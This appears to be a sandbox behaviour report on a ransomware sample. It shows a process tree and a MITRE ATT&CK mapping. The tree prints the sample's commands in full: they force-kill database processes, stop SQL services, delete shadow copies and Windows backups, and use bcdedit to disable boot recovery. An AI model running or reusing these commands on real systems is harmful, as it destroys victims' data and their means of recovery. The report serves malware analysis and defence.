PID 3528 wrote to memory of 232	3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe	100
PID 3528 wrote to memory of 232	3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe	100
PID 3528 wrote to memory of 232	3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe	100
PID 232 wrote to memory of 3276	232	cmd.exe	102
PID 232 wrote to memory of 3276	232	cmd.exe	102
PID 3276 wrote to memory of 3172	3276	cmd.exe	103
PID 3276 wrote to memory of 3172	3276	cmd.exe	103
PID 3528 wrote to memory of 4172	3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe	105
PID 3528 wrote to memory of 4172	3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe	105
PID 3528 wrote to memory of 4172	3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe	105
PID 4172 wrote to memory of 4756	4172	cmd.exe	107
PID 4172 wrote to memory of 4756	4172	cmd.exe	107
PID 4756 wrote to memory of 4976	4756	cmd.exe	108
PID 4756 wrote to memory of 4976	4756	cmd.exe	108
PID 3528 wrote to memory of 1532	3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe	109
PID 3528 wrote to memory of 1532	3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe	109
PID 3528 wrote to memory of 1532	3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe	109
PID 1532 wrote to memory of 4148	1532	cmd.exe	111
PID 1532 wrote to memory of 4148	1532	cmd.exe	111
PID 4148 wrote to memory of 3356	4148	cmd.exe	112
PID 4148 wrote to memory of 3356	4148	cmd.exe	112
PID 3528 wrote to memory of 2988	3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe	113
PID 3528 wrote to memory of 2988	3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe	113
PID 3528 wrote to memory of 2988	3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe	113
PID 2988 wrote to memory of 3036	2988	cmd.exe	115
PID 2988 wrote to memory of 3036	2988	cmd.exe	115
PID 3036 wrote to memory of 3452	3036	cmd.exe	116
PID 3036 wrote to memory of 3452	3036	cmd.exe	116
PID 3528 wrote to memory of 564	3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe	117
PID 3528 wrote to memory of 564	3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe	117
PID 3528 wrote to memory of 564	3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe	117
PID 564 wrote to memory of 2556	564	cmd.exe	119
PID 564 wrote to memory of 2556	564	cmd.exe	119
PID 2556 wrote to memory of 1132	2556	cmd.exe	120
PID 2556 wrote to memory of 1132	2556	cmd.exe	120
PID 3528 wrote to memory of 4288	3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe	121
PID 3528 wrote to memory of 4288	3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe	121
PID 3528 wrote to memory of 4288	3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe	121
PID 4288 wrote to memory of 4924	4288	cmd.exe	124
PID 4288 wrote to memory of 4924	4288	cmd.exe	124
PID 4924 wrote to memory of 456	4924	cmd.exe	125
PID 4924 wrote to memory of 456	4924	cmd.exe	125
PID 3528 wrote to memory of 3288	3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe	126
PID 3528 wrote to memory of 3288	3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe	126
PID 3528 wrote to memory of 3288	3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe	126
PID 3288 wrote to memory of 4028	3288	cmd.exe	128
PID 3288 wrote to memory of 4028	3288	cmd.exe	128
PID 4028 wrote to memory of 1152	4028	cmd.exe	129
PID 4028 wrote to memory of 1152	4028	cmd.exe	129
PID 3528 wrote to memory of 2156	3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe	130
PID 3528 wrote to memory of 2156	3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe	130
PID 3528 wrote to memory of 2156	3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe	130
PID 2156 wrote to memory of 4104	2156	cmd.exe	132
PID 2156 wrote to memory of 4104	2156	cmd.exe	132
PID 4104 wrote to memory of 2324	4104	cmd.exe	133
PID 4104 wrote to memory of 2324	4104	cmd.exe	133
PID 3528 wrote to memory of 3912	3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe	134
PID 3528 wrote to memory of 3912	3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe	134
PID 3528 wrote to memory of 3912	3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe	134

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3336
- C:\Users\Admin\AppData\Local\Temp\82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
  "C:\Users\Admin\AppData\Local\Temp\82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Adds Run key to start application
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3528
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill \"SQL\"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1760
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c rem Kill \"SQL\"
      4⤵
      PID:4028
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:232
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3276
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sqlbrowser.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3172
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4172
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4756
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sql writer.exe
        5⤵
        Kills process with taskkill
        
        PID:4976
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1532
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4148
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sqlserv.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3356
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2988
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3036
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im msmdsrv.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3452
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:564
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2556
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im MsDtsSrvr.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1132
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4288
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4924
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sqlceip.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:456
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3288
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4028
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im fdlauncher.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1152
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2156
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4104
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im Ssms.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2324
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
    3⤵
    PID:3912
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
      4⤵
      PID:2532
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im SQLAGENT.EXE
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1480
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
    3⤵
    PID:2272
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
      4⤵
      PID:640
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im fdhost.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1580
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
    3⤵
    PID:3524
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
      4⤵
      PID:636
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im ReportingServicesService.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3520
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
    3⤵
    PID:1976
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
      4⤵
      PID:1224
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im msftesql.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3404
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
    3⤵
    PID:4508
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
      4⤵
      PID:1740
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im pg_ctl.exe
        5⤵
        Kills process with taskkill
        
        PID:4340
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe
    3⤵
    PID:2436
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe
      4⤵
      PID:4028
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -impostgres.exe
        5⤵
        Kills process with taskkill
        
        PID:1152
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
    3⤵
    PID:3256
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
      4⤵
      PID:4104
    - - C:\Windows\system32\net.exe
        
        net stop MSSQLServerADHelper100
        5⤵
        
        PID:3744
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLServerADHelper100
        6⤵
        
        PID:2524
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
    3⤵
    PID:4540
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS
      4⤵
      PID:3176
    - - C:\Windows\system32\net.exe
        
        net stop MSSQL$ISARS
        5⤵
        
        PID:2208
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$ISARS
        6⤵
        
        PID:5064
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
    3⤵
    PID:1532
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW
      4⤵
      PID:1004
    - - C:\Windows\system32\net.exe
        
        net stop MSSQL$MSFW
        5⤵
        
        PID:3376
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$MSFW
        6⤵
        
        PID:2728
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
    3⤵
    PID:3408
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS
      4⤵
      PID:4308
    - - C:\Windows\system32\net.exe
        
        net stop SQLAgent$ISARS
        5⤵
        
        PID:3524
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$ISARS
        6⤵
        
        PID:2284
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
    3⤵
    PID:4944
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW
      4⤵
      PID:4900
    - - C:\Windows\system32\net.exe
        
        net stop SQLAgent$MSFW
        5⤵
        
        PID:1976
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$MSFW
        6⤵
        
        PID:3328
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
    3⤵
    PID:2724
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4340
    - - C:\Windows\system32\net.exe
        
        net stop SQLBrowser
        5⤵
        
        PID:2340
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLBrowser
        6⤵
        
        PID:888
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS
    3⤵
    PID:1760
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS
      4⤵
      PID:2156
    - - C:\Windows\system32\net.exe
        
        net stop REportServer$ISARS
        5⤵
        
        PID:2440
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop REportServer$ISARS
        6⤵
        
        PID:3172
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter
    3⤵
    PID:3256
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLWriter
      4⤵
      PID:3688
    - - C:\Windows\system32\net.exe
        
        net stop SQLWriter
        5⤵
        
        PID:2208
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLWriter
        6⤵
        
        PID:3176
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
    3⤵
    PID:4456
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
      4⤵
      PID:3120
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin.exe Delete Shadows /All /Quiet
        5⤵
        Interacts with shadow copies
        
        PID:4528
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
    3⤵
    PID:5064
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
      4⤵
      PID:2616
    - - C:\Windows\system32\wbadmin.exe
        
        wbadmin delete backup -keepVersion:0 -quiet
        5⤵
        Deletes system backups
        
        PID:564
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
    3⤵
    PID:4084
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
      4⤵
      PID:3524
    - - C:\Windows\system32\wbadmin.exe
        
        wbadmin DELETE SYSTEMSTATEBACKUP
        5⤵
        Deletes System State backups
        Drops file in Windows directory
        
        PID:4024
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
    3⤵
    PID:3416
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
      4⤵
      PID:636
    - - C:\Windows\system32\wbadmin.exe
        
        wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
        5⤵
        
        PID:4324
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
    3⤵
    PID:1840
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
      4⤵
      PID:3128
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic.exe SHADOWCOPY /nointeractive
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2340
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
    3⤵
    PID:3268
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
      4⤵
      PID:4608
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit.exe /set {default} recoverynabled No
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:4212
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    PID:2272
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      4⤵
      PID:1460
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:3968
- C:\Users\Admin\AppData\Local\Temp\82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
  \\?\C:\Users\Admin\AppData\Local\Temp\82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe -network
  2⤵
  - Adds Run key to start application
  PID:972
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c pause
    3⤵
    PID:4184

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3744

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3852 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:8
1⤵
PID:5744

C:\Windows\explorer.exe
explorer.exe
1⤵
- Modifies Installed Components in the registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4648

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Defense Evasion

Indicator Removal

T1070

File Deletion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery